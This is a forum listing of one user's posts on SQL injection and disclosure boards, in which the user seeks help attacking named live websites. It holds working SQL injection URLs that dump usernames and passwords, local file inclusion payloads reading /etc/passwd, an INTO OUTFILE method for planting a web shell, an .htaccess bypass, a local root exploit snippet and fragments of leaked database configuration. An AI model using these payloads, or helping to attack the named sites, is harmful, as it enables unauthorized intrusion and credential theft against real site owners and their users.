Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Pages: 1 2 Next
Current Page: 1 of 2
Results 1 - 30 of 41
3 years ago
TopSaT13
thanggiangho Wrote:
-------------------------------------------------------
> ok- 403 forbidden when i add ' >>>no injection (
> not sure)
>
> :D 99% no vuln
Forum: SQL and Code Injection
3 years ago
TopSaT13
source code of page <?php session_start();?> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <?php //$link = mysql_connect("127.0.0.1","x","x") or die("Impossible de se connecter"); //mysql_select_db("khaldoun") or die("Could not select database"); if (!isset($_G
Forum: SQL and Code Injection
3 years ago
TopSaT13
thanks brothers but ... %00 and %0a can't do anything so i can't remove extension .php ?id=php://filter/read=convert.base64-encode/resource=/etc/passwd%0A => Warning: include(php://filter/read=convert.base64-encode/resource=/etc/passwd .php) : failed to open stream: No such file or directory in /var/www/site/index.php on line 70 and ?id=php://filter/read=convert.base64-encode/resource
Forum: SQL and Code Injection
3 years ago
TopSaT13
Reiners Wrote:
-------------------------------------------------------
> as you see in the warning there is no filter and
> the file name is passed successfully to the
> include function. something else must be wrong.
> are you sure the file exists?

yes exist :) why i can't read /etc/passwd ?.. ?id=/etc/passwd result==> Warning: include(/etc/passwd.php) : failed to o
Forum: SQL and Code Injection
3 years ago
TopSaT13
Hey friends! i found an lfi vuln.. but i can't read /etc/passwd or any file not in vuln directory look : ?id=php://filter/read=convert.base64-encode/resource=index.php ===>> Warning: include(php://filter/read=convert.base64-encode/resource=index.php.php) : failed to open stream: No such file or directory in /var/www/site/index.php on line 70 ---------- and i del .php----- ?id=php:
Forum: SQL and Code Injection
3 years ago
TopSaT13
Powered by iWebKit :D
Forum: SQL and Code Injection
3 years ago
TopSaT13
VMw4r3 Wrote:
-------------------------------------------------------
> Why do you want to bypass the filter when there's
> no injection?

yes...just like idea ! :D
Forum: SQL and Code Injection
3 years ago
TopSaT13
VMw4r3 Wrote:
-------------------------------------------------------
> It looks like (') is filtered.

** yes bro i know but i need any method to bypass this filter ?
Forum: SQL and Code Injection
3 years ago
TopSaT13
Hi brothers all fine ^^ i found this web site vuln sqli delphi.dev-dz.com/autresites_detail.php?id=47 but when i add (') in value id=47' get Forbidden and order by 1 no error order by 10000000000000000-- no error but when i add (') like: autresites_detail.php?id=47' orde by 1--+ i get Forbidden please my brothers ..any bypass this forbidden ! Thanks a lot ! : )
Forum: SQL and Code Injection
3 years ago
TopSaT13
hi brothers...how are you fine :D i found a vuln site rnd-dz.com/view_histo_fond_ar.php?news_id=-6%27+union+select+group_concat%28user_id,0x3e,username,0x3a,password,0x3e,email%29,2,3,4,5+from+sys_user--+ so when i use load file to read passwd file (or any file) ....not have any error and not get any file ?? like : rnd-dz.com/view_histo_fond_ar.php?news_id=-6%27+union+select+load_file%28%
Forum: SQL and Code Injection
3 years ago
TopSaT13
hi members i have shell on secure server many functions were disabled by Security but i can't bypass it info: PHP Version 5.2.15 disabled functions : Code: symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,passthru,escapeshellarg,escapeshellcmd,posix_getgid,virtual,posix_getgrgid,dl,set_time_limit,exec,pclose,proc_nice,proc_terminate,proc_get_status,pfsockopen,leak,apache_c
Forum: Full Disclosure
3 years ago
TopSaT13
Plitvix : tnx my brother tnx all i found solution : etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/bin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync man:x:6:12:man:/var/cache/man:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/
Forum: SQL and Code Injection
3 years ago
TopSaT13
hi brothers ..fine? i found an sqli in universite.univ-tlemcen.dz .. when i put (') in search bar i found sql error Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/Annuaire/public_html/resultat_recherche.php on line 55 Erreur dans la requete: SELECT * FROM `enseignant` WHERE UPPER(nom) LIKE ''%' Avec erreur: You have an error in your SQL syntax; ch
Forum: SQL and Code Injection
3 years ago
TopSaT13
antivirus @ thank u bro :):) -------------------- waiting any helps for this injection http://www.abigailandeye.co.uk/client-gallery/index.php?pageId=104&start=0 Only For education
Forum: SQL and Code Injection
3 years ago
TopSaT13
Hi all, i found this problem http://www.abigailandeye.co.uk/client-gallery/index.php?pageId=104&start=0 when i add (') = Forbidden :( order by 1 no error :) but order by 1000000000000000000000000 no error i add --+ at end i found forbidden 0' order by 1 --+ = forbidden :-( any helps ?? please :) ----- http://www.ubiquisys.com/ub3b/pressreleases.php?id=115 forbidden :(
Forum: SQL and Code Injection
4 years ago
TopSaT13
hi all everyone finds this problem when he wants to get root result is mmap:permission denied because "Mmap_min_addr" not 0 everyone have how to bypass "Mmap_min_addr" and write on 0 "Zero" simple example: ------------------------------------------------------------- cat /proc/sys/vm/mmap_min_addr 0 gcc -o gayros local-root-exploit-gayros.c ./gayros we
Forum: Full Disclosure
4 years ago
TopSaT13
:O, i don't think those are hashes
Forum: SQL and Code Injection
4 years ago
TopSaT13
No comment..:@
Forum: SQL and Code Injection
4 years ago
TopSaT13
so hyrax i don't understand your problem give me url and i see good luck
Forum: SQL and Code Injection
4 years ago
TopSaT13
hyrax @ look brother i'm not children, ok i can't understand your problem by txt file, + i'm Ethical Hacker . so respect me . 2.i post url because by url i can test and tell you where is problem ok :@ so be respect
Forum: SQL and Code Injection
4 years ago
TopSaT13
look bro :) to inject shell you must folder chmod 777 like uploads/ , img/ if you not find folder chmod 777 you can't inject shell example: upload is chmod 777 hxxt://google.com/web.php?id=-1 union select 1,2,'test',4,5 into outfile '/home/google/pub/upload/tst.php'-- google . com /upload/tst.php ..found :)
Forum: SQL and Code Injection
4 years ago
TopSaT13
maybe run
Forum: Full Disclosure
4 years ago
TopSaT13
@VMw4re i find it :D <?php //Header("Cache-control: private, no-cache"); //Header("Expires: Mon, 26 Jun 1997 05:00:00 GMT"); //Header("Pragma: no-cache"); //Header ("Last-Modified: " . gmdate ("D, d M Y H:i:s") . " GMT"); // This is an example of config.php $dbhost = 'localhost'; $dbuser = 'singart_singuser'; $dbpass =
Forum: SQL and Code Injection
4 years ago
TopSaT13
thank you my friend but, you use load file to read it?
Forum: SQL and Code Injection
4 years ago
TopSaT13
arabs found its since 200x
Forum: Bugs
4 years ago
TopSaT13
Hi all @hc0de .you can explain to me how to read config.php by this http://www.singaporeartmuseum.sg/exhibitions/details.php?id=-48+UNION+/*!SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764
Forum: SQL and Code Injection
4 years ago
TopSaT13
@flics: Thank you my friend :) this: Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php ---------------- to bypass forbidden :) i use it on many servers it runs normally :p i think , the root disabled some commands htaccess
Forum: SQL and Code Injection